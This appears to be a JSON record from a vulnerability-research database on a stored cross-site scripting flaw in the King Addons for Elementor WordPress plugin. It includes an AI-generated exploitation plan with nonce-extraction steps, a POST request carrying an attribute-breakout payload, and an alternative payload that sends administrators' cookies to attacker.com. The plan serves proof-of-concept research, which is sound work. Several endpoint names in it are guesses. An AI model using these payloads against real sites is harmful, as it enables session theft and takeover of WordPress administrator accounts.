[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fbIyZtzXwAM-d_biNOBN_UbuDFr3PZym2diSfGAvpZ9E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":16,"references":17,"days_to_patch":19,"patch_diff_files":20,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"WF-349ba9de-69b3-42fb-aeba-c3a24280547f-king-addons","king-addons-for-elementor-authenticated-subscriber-stored-cross-site-scripting-via-formpageid-parameter","King Addons for Elementor \u003C= 51.1.62 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'form_page_id' Parameter","The King Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_page_id' parameter in versions up to, and including, 51.1.62 This is due to insufficient input sanitization in the add_to_submissions() function, which applies sanitize_text_field() (which preserves double-quote characters) before storing the value in post meta, combined with missing output escaping in the king_addons_submissions_custom_column_content() function, which concatenates the stored value into an HTML href attribute via admin_url() without wrapping the result in esc_url(). This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","king-addons",null,"\u003C=51.1.62","51.1.63","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-15 17:09:00",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F349ba9de-69b3-42fb-aeba-c3a24280547f?source=api-prod",0,[21,22,23,24,25,26,27,28],"includes\u002Fadmin\u002Flayouts\u002Fdashboard-v3\u002Fdashboard-v3.php","includes\u002Fadmin\u002Flayouts\u002Fsettings-page.php","includes\u002Fcontrols\u002FAjax_Select2\u002FAjax_Select2_API.php","includes\u002Fextensions\u002FAI_SEO_Tools\u002FAuto_Tagging_Module.php","includes\u002Fextensions\u002FDocs_KB\u002FDocs_KB.php","includes\u002Fextensions\u002FLive_Chat\u002FLive_Chat.php","includes\u002Fextensions\u002FPricing_Table_Builder\u002FPricing_Table_Builder.php","includes\u002Fextensions\u002FTemplates\u002FTemplates.php","researched",false,3,"# Exploitation Research Plan - King Addons for Elementor (Stored XSS)\n\n## 1. Vulnerability Summary\nThe King Addons for Elementor plugin (versions \u003C= 51.1.62) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `form_page_id` parameter. The vulnerability occurs because the plugin stores this parameter using `sanitize_text_field()`—which permits double-quote characters (`\"`)—and later renders it in the WordPress admin dashboard without proper URL escaping. Specifically, the value is concatenated into an HTML `href` attribute using `admin_url()` but is not wrapped in `esc_url()` before being echoed in a custom column in the submissions list.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `king_addons_form_submission` or `king_addons_post_submission` (inferred from plugin functionality)\n- **Vulnerable Parameter:** `form_page_id`\n- **Authentication:** Subscriber-level access or above is required to reach the vulnerable code path (as per CVE description).\n- **Preconditions:** The \"Form\" widget or \"Submissions\" extension must be active.\n\n## 3. Code Flow\n1. **Submission Entry:** An authenticated user (Subscriber+) submits a form powered by King Addons. The request is sent to an AJAX handler (likely registered in an extension file not fully shown in the snippet).\n2. **Data Processing:** The handler calls `add_to_submissions()`. Inside this function:\n   - `$_POST['form_page_id']` is captured.\n   - It is \"sanitized\" using `sanitize_text_field($_POST['form_page_id'])`.\n3. **Storage:** The value is stored as post meta (likely `_form_page_id` or similar) for a new `king_submission` post type.\n4. **Admin Display:** An administrator navigates to the \"Submissions\" list in the WordPress dashboard.\n5. **Vulnerable Sink:** The function `king_addons_submissions_custom_column_content()` (inferred to be located in `includes\u002Fadmin\u002Fsubmissions.php` or similar) handles the display of the custom column.\n   - It retrieves the meta: `$page_id = get_post_meta($post_id, 'form_page_id', true);`\n   - It builds a URL: `$edit_url = admin_url('post.php?post=' . $page_id . '&action=edit');`\n   - It outputs the link: `echo '\u003Ca href=\"' . $edit_url . '\">View Page\u003C\u002Fa>';` (Missing `esc_url`).\n   - Because `$page_id` contains a double quote, the attacker can break out of the `href` attribute.\n\n## 4. Nonce Acquisition Strategy\nThe form submission endpoint likely requires a nonce for security. Since the plugin uses `wp_localize_script`, the nonce is exposed in the frontend.\n\n1. **Identify the Shortcode:** Find a page containing a \"King Addons Form\" or create one:\n   `wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[king_form id=\"123\"]'`\n2. **Navigate:** Use `browser_navigate` to view the page.\n3. **Extract Nonce:** Use `browser_eval` to find the localized script object. Based on common King Addons patterns, the variable is likely `king_addons_form_params`.\n   - **Command:** `browser_eval(\"window.king_addons_form_params?.nonce\")`\n   - *Note:* If the above is missing, check for `kingAddonsConfig` or similar keys in the global `window` object.\n\n## 5. Exploitation Strategy\n### Step 1: Submit Malicious Payload\nSend a POST request to the AJAX endpoint with a payload designed to break out of the `href` attribute.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n  - `action`: `king_addons_form_submission` (inferred)\n  - `nonce`: `[EXTRACTED_NONCE]`\n  - `form_page_id`: `1\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:1000px;height:1000px;\" data-x=\"`\n  - `form_id`: `1` (or any valid ID)\n  - `fields[email]`: `test@example.com`\n\n### Step 2: Trigger Execution\n1. Log in as an **Administrator**.\n2. Navigate to the King Addons Submissions page (likely `wp-admin\u002Fadmin.php?page=king-addons-submissions`).\n3. Hover over the \"View Page\" link in the submissions table.\n4. The JavaScript `alert(document.domain)` will execute.\n\n## 6. Test Data Setup\n1. **User:** Create a subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`.\n2. **Form:** Ensure at least one King Addons form is created and its submissions are being tracked.\n3. **Page:** Create a page with a King Form to extract the nonce.\n\n## 7. Expected Results\n- The AJAX request should return a success message (e.g., `{\"success\":true}`).\n- In the database, the `post_meta` for the submission should contain the raw payload string: `1\" onmouseover=\"alert(document.domain)\" ...`.\n- When the admin views the list table, the HTML source should look like:\n  `\u003Ca href=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php?post=1\" onmouseover=\"alert(document.domain)\" style=\"...\" data-x=\"&action=edit\">View Page\u003C\u002Fa>`\n\n## 8. Verification Steps\n1. **Check Database:** `wp post meta list [SUBMISSION_ID] --keys=form_page_id`\n2. **Verify HTML Output:** Access the submissions page and search for the payload in the DOM using `browser_eval(\"document.body.innerHTML.includes('onmouseover=\\\"alert')\")`.\n\n## 9. Alternative Approaches\n- **Payload Variant:** If `onmouseover` is filtered or difficult to trigger, try an `autofocus` payload:\n  `1\" autofocus onfocus=\"alert(1)\" x=\"`\n- **Blind XSS:** Instead of `alert`, use a fetch request to an external collaborator to prove execution in the admin context:\n  `1\" onmouseover=\"fetch('https:\u002F\u002Fattacker.com\u002Flog?c='+document.cookie)\" x=\"`\n- **Action Guessing:** If `king_addons_form_submission` fails, use `grep -r \"wp_ajax\" includes\u002F` in the plugin directory to find the correct submission action.","gemini-3-flash-preview","2026-06-25 23:47:36","2026-06-25 23:48:40",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","51.1.62","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.62","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.62.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags\u002F51.1.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fking-addons.51.1.63.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fking-addons\u002Ftags"]